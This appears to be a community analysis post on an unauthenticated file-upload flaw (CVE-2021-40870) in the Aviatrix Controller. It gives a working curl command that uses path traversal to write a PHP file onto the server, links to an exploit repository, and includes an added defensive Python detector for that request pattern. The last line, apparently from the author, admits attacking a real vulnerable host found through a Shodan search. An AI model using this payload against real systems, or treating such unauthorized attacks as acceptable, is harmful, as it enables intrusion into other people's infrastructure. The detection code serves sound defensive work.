JoyGhoshs (2)
JoyGhoshs's Latest (2) Contributions
Technical Analysis
Description
This vulnerability allows an attacker to create and store files on the Aviatrix Controller. Exploitation requires neither authentication nor any interaction from other users; it can be exploited simply with curl. Here is one example.
curl -k https://aviatrix.domain.tld/v1/backend1 -d CID=x -d action=set_metric_gw_selections -d account_name=/../../../var/www/php/poc.php -d 'data=hello<?php echo "Vulnerable Poc";?>'
# After executing the previous command, if the target is vulnerable, this creates a PHP file at this path: https://vulnerable.target.com/v1/poc
An attacker can do this without authenticating because many API calls do not enforce an authentication check. This allows an unauthenticated attacker to upload arbitrary files, including .php scripts, to the filesystem.
Alternatively, this exploit makes exploitation easier: https://github.com/JoyGhoshs/CVE-2021-40870
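A defender-side check for the request pattern described above, as an added example that is not part of the original analysis or of Aviatrix's code: it inspects form-encoded POST bodies (for instance at a reverse proxy or in captured traffic) and flags an account_name that carries path traversal. The function names and sample requests are constructed for illustration, and the handling of nested percent-encoding goes beyond the single request shown.

```python
"""Added detection example: flag requests whose account_name escapes its directory."""
import re
from urllib.parse import parse_qsl, unquote

ENDPOINT = "/v1/backend1"                    # API path from the request shown above
ACTION = "set_metric_gw_selections"          # action from the request shown above
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding (%252e%252e -> ..) before matching."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_request(method, path, body):
    """Return a list of findings for one HTTP request; an empty list means clean."""
    if method != "POST" or path.split("?")[0].rstrip("/") != ENDPOINT:
        return []
    params = dict(parse_qsl(body, keep_blank_values=True))
    if params.get("action") != ACTION:
        return []
    findings = []
    name = fully_decode(params.get("account_name", ""))
    if TRAVERSAL.search(name):
        findings.append("account_name contains a ../ sequence")
    if "/" in name or "\\" in name or "\x00" in name:
        findings.append("account_name contains a path separator or NUL")
    if "<?" in fully_decode(params.get("data", "")):
        findings.append("data contains a PHP open tag")
    return findings

# Constructed sample requests (method, path, body), not captured traffic.
SAMPLES = [
    ("POST", "/v1/backend1", "CID=x&action=set_metric_gw_selections&account_name=prod-aws&data=gw1"),
    ("POST", "/v1/backend1", "CID=x&action=set_metric_gw_selections"
                             "&account_name=%2F..%2F..%2F..%2Fvar%2Fwww%2Fphp%2Fpoc.php&data=hello"),
    ("POST", "/v1/backend1", "CID=x&action=set_metric_gw_selections"
                             "&account_name=%252e%252e%252fetc%252fx&data=hello"),
]

if __name__ == "__main__":
    for method, path, body in SAMPLES:
        print(inspect_request(method, path, body) or "clean", "<-", body[:70])
```

A finding from this check on a request that carried no session is worth treating as an incident lead, since the analysis above states that the call is reachable without authentication.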
Hey @ccondon-r7, yes, I have performed an active attack against a vulnerable target which I found on Shodan by doing a little search.